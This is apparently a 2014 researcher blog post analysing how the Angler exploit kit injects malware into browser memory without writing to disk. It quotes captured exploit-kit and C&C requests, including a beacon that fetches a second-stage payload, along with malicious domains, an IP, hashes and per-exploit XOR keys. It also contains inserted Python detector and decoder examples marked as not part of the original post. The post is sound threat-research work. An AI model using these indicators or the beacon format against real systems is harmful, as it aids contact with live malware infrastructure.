2014-08-31 - Evolution
Angler EK : now capable of "fileless" infection (memory malware)
Matrix - Agent Jackson avoiding bullets |
A few days ago I spotted a new pattern in some Angler EK threads:
New pattern in a Vawtrak Thread from Angler EK Fired : CVE-2013-2551 - 2014-08-28 |
New pattern in another Vawtrak Thread from Angler EK Fired : CVE-2014-0515 - 2014-08-29 |
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive
Wondering what it was, I went over different infection paths and spotted only one thread without this "new" count?b. [Note: on 2014-08-31, count?b appeared on that thread too]
Angler EK - 2014-08-28 "Memory Malware" thread |
The exploits' hashes were the same as on all other threads, but my usual tools were not able to gather the payload, and what surprised me more is that HIPS (like Faronics Anti-Executable) were bypassed (note: I tried Malwarebytes Anti-Exploit and it was able to spot the ROP and stack pivoting).
I spent some time figuring out what was happening here:
Angler EK is now able to infect a host without writing the malware to the drive (it is injected directly into the process running the exploited plugin).
Angler EK (no landing on this screen, CVE-2014-0515 fired) and callback from the malware injected in Internet Explorer. 2nd stage drop: 275c5f650261e80d864faf7cc6b70774, injecting itself into explorer.exe and then fetching Necurs from the same C&C (e.g. be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28, b0e3e860a2dc62cb40fd6ef897ad592b - 2014-08-29, 5830dfde30873176d05604677bab6bd9 - 2014-08-30) |
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM
The call for the 2nd stage payload looks like:
POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache
{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}
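As an added example (not from the original post or its tooling), a small Python detector that flags the two request shapes quoted above in a constructed set of proxy records: the `count?b=` GET and the JSON second-stage beacon. The ten-character directory before `count` is an assumption generalised from the single URL shown, and the sample records are constructed.

```python
import json
import re

# Constructed sample of proxy records as (method, url, body). Only the URL and
# JSON shapes follow the two requests quoted in the post; the rest is made up.
SAMPLE_SESSIONS = [
    ("GET", "http://rwvs30r2zq.akdnbfb.com/qpbv8tg4ee/count?b=1", ""),
    ("GET", "http://example.org/news/count?b=1", ""),  # path segment too short
    ("POST", "https://koqpisea.in/", '{"protocolVersion":1,"buildId":1049,'
     '"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}'),
    ("POST", "https://example.net/api", '{"user":"a","pw":"b"}'),
]

# Assumption: the directory before count is always 10 lowercase alphanumerics,
# generalised from the single sample in the post.
COUNT_RE = re.compile(r"^https?://[^/]+/[a-z0-9]{10}/count\?b=\d+$")

def is_angler_count_beacon(method, url):
    return method == "GET" and COUNT_RE.match(url) is not None

def parse_stage2_beacon(method, body):
    """Return buildId, bot id and requested bitness when a POST body has the
    second-stage beacon shape quoted above, else None."""
    if method != "POST":
        return None
    try:
        doc = json.loads(body)
    except ValueError:
        return None
    if not isinstance(doc, dict) or not {"protocolVersion", "buildId", "id", "tags"} <= set(doc):
        return None
    tags = doc.get("tags")
    if not isinstance(tags, list):
        return None
    dll = [t for t in tags if isinstance(t, dict) and t.get("type") == "dll"]
    if not dll:
        return None
    return {"buildId": doc["buildId"], "bot_id": doc["id"],
            "x64": dll[0].get("64bit") == 1}

def scan(sessions):
    """Tag every record that matches one of the two Angler request shapes."""
    hits = []
    for method, url, body in sessions:
        if is_angler_count_beacon(method, url):
            hits.append(("angler_count", url, None))
        beacon = parse_stage2_beacon(method, body)
        if beacon is not None:
            hits.append(("stage2_beacon", url, beacon))
    return hits
```

The beacon travels over HTTPS, so the JSON check only works on bodies visible after TLS interception (a Fiddler capture, as in the post).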
This feature opens a wide range of possibilities. Besides being a powerful way to bypass some AV and an ideal fit for one-time stealers or loaders (Pony, Jolly Roger, Andromeda, Smoke Bot, etc.), it also allows a detailed check of the infected host before getting a little noisier and writing anything to disk. It also makes it difficult to grab the dropper (you have to get it from memory or from the recorded traffic and then decode it). This is a powerful move for the attack side.
Additional illustrations :
Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 2014-08-30 |
Image courtesy of Will Metcalf (Emerging Threats): Java calling the payload, then "memory payload" activity captured by his Cuckoo instance, 2014-08-28 |
<edit >
The encoded stream, which usually contains the XORed + byte-shifted malware, is different in this configuration.
In Angler each exploit has its own XOR key:
Xor key in Angler "fileless" thread CVE-2014-0515 stream |
CVE-2013-2551 = "adR2b4nh"
CVE-2014-0515 = "wT6QtySY"
CVE-2014-0322 = "laspfnfd"
Java = "FroSHu9h"
Silverlight = "aldonjfg"
The stream now starts with a XORed shellcode (which has been spotted by EKWatcher as early as 2014-08-18 in a thread fed by Adnxs (AppNexus) malvertising).
32 bits version of the stream after a XOR pass. First part is a Shellcode. Second part is a Dll |
After a XOR and split operation (disclaimer: it could be not enough to get the real DLL, as Angler has a history of doing more than just a XOR):
Stream Shellcode 32bits
Xored MZ part : 32f4a876c1819713d13e1d14d8cb0a02
That encoded DLL is the same threat as the one called back after infection (still waiting for a proper name from AV vendors). String spotted: C:\Remedies\And.pdb
David Sanchez (Malwarebytes) figured out that the payload is hooking kernel32!ExitProcess, which explains why iexplore.exe was still loaded after the browser was closed.
If the victim's OS is 64 bits then a 64-bit shellcode and a 64-bit version of the DLL are sent instead:
Angler EK 2014-09-04 In bold Green : - Encoded stream - Same Distribution threat as the encoded one, downloaded from the C&C - Asterope |
Unnamed Distribution bot (64bits variant) : 1b4cbec2a2d634ae257a760d43ba6bc5
It seems that the callback C&C is operated by the Angler EK guys and is a kind of "Distribution botnet" (or loader in "CaaS" mode).
</edit>
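An added example, not the author's tooling: a Python decoder for the plain-XOR case described in this edit, using the per-exploit keys listed above. It XORs the stream, splits it at the first offset carrying a plausible PE (MZ plus a PE signature at e_lfanew), and reads the Machine field to tell a 32-bit DLL from the 64-bit variant. The input stream is constructed (a fake header, not a real Angler capture), and as the disclaimer above says, a real stream may need more than a XOR.

```python
import hashlib
import struct

# Per-exploit XOR keys listed in the post.
XOR_KEYS = {
    "CVE-2013-2551": b"adR2b4nh",
    "CVE-2014-0515": b"wT6QtySY",
    "CVE-2014-0322": b"laspfnfd",
    "Java": b"FroSHu9h",
    "Silverlight": b"aldonjfg",
}

def xor_decode(data, key):
    """Repeating-key XOR (symmetric). Only the plain-XOR case is handled here."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def split_shellcode_and_dll(decoded):
    """Split at the first offset that carries a plausible PE: 'MZ' there and the
    PE signature at e_lfanew. Returns (shellcode, dll) or None."""
    pos = decoded.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(decoded):
            e_lfanew = struct.unpack_from("<I", decoded, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if decoded[pe:pe + 4] == b"PE\0\0":
                return decoded[:pos], decoded[pos:]
        pos = decoded.find(b"MZ", pos + 1)
    return None

def pe_machine(dll):
    """IMAGE_FILE_HEADER.Machine: 0x14C = x86 stream, 0x8664 = x64 stream."""
    e_lfanew = struct.unpack_from("<I", dll, 0x3C)[0]
    return struct.unpack_from("<H", dll, e_lfanew + 4)[0]

def analyse_stream(stream, exploit):
    parts = split_shellcode_and_dll(xor_decode(stream, XOR_KEYS[exploit]))
    if parts is None:
        return None
    shellcode, dll = parts
    return {"shellcode_len": len(shellcode), "machine": pe_machine(dll),
            "dll_md5": hashlib.md5(dll).hexdigest()}

# Constructed sample: 16 NOP filler bytes as "shellcode", then a minimal fake
# PE header (MZ, e_lfanew = 0x40, PE signature, Machine = 0x14C), XORed with
# the CVE-2014-0515 key as it would travel on the wire.
FAKE_DLL = bytearray(b"MZ" + b"\0" * 0x3E)
FAKE_DLL[0x3C:0x40] = struct.pack("<I", 0x40)
FAKE_DLL += b"PE\0\0" + struct.pack("<H", 0x14C) + b"\0" * 18
FAKE_STREAM = xor_decode(b"\x90" * 16 + bytes(FAKE_DLL), XOR_KEYS["CVE-2014-0515"])
```

Checking for the PE signature before splitting avoids cutting on a stray "MZ" inside the shellcode; the MD5 of the split DLL is what you would compare against the hashes given in the post.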
Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advice.
Thanks to EkWatcher and David Sanchez (Malwarebytes) for information and insight into the "RE" side of this thread.
Files:
AnglerEK_MM_2014-08-31 (Fiddler captures + bot + C&C calls - Owncloud)
AnglerEK_MM_2014-09-05 (2 additional Fiddler captures, 64-bit streams and C&C callback - Owncloud)
If you want to play with Volatility or whatever, here is the memory dump (Mega) of a VM taken while IE was injected and calling the C&C (IE pid: 860)
Capture of Fiddler just before pausing the VM 2014-08-30 |
<edit 2014-09-26>
That was inevitable, this is happening. Fileless Poweliks meets Fileless Angler EK thread. Combo ! pic.twitter.com/5mobHrlt27
— kafeine (@kafeine) September 26, 2014
</edit>
<edit 2014-09-29>
Bedep ! The distribution botnet tied to most of the fileless Angler EK threads has a name now ! Thx @eset pic.twitter.com/Sw2a8sxgfS
— kafeine (@kafeine) September 29, 2014
</edit>
Read More:
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik - SecurityXploded
A unique 'bodiless' bot attacks news site visitors - 2012-03-06 - Sergey Golovanov - Securelist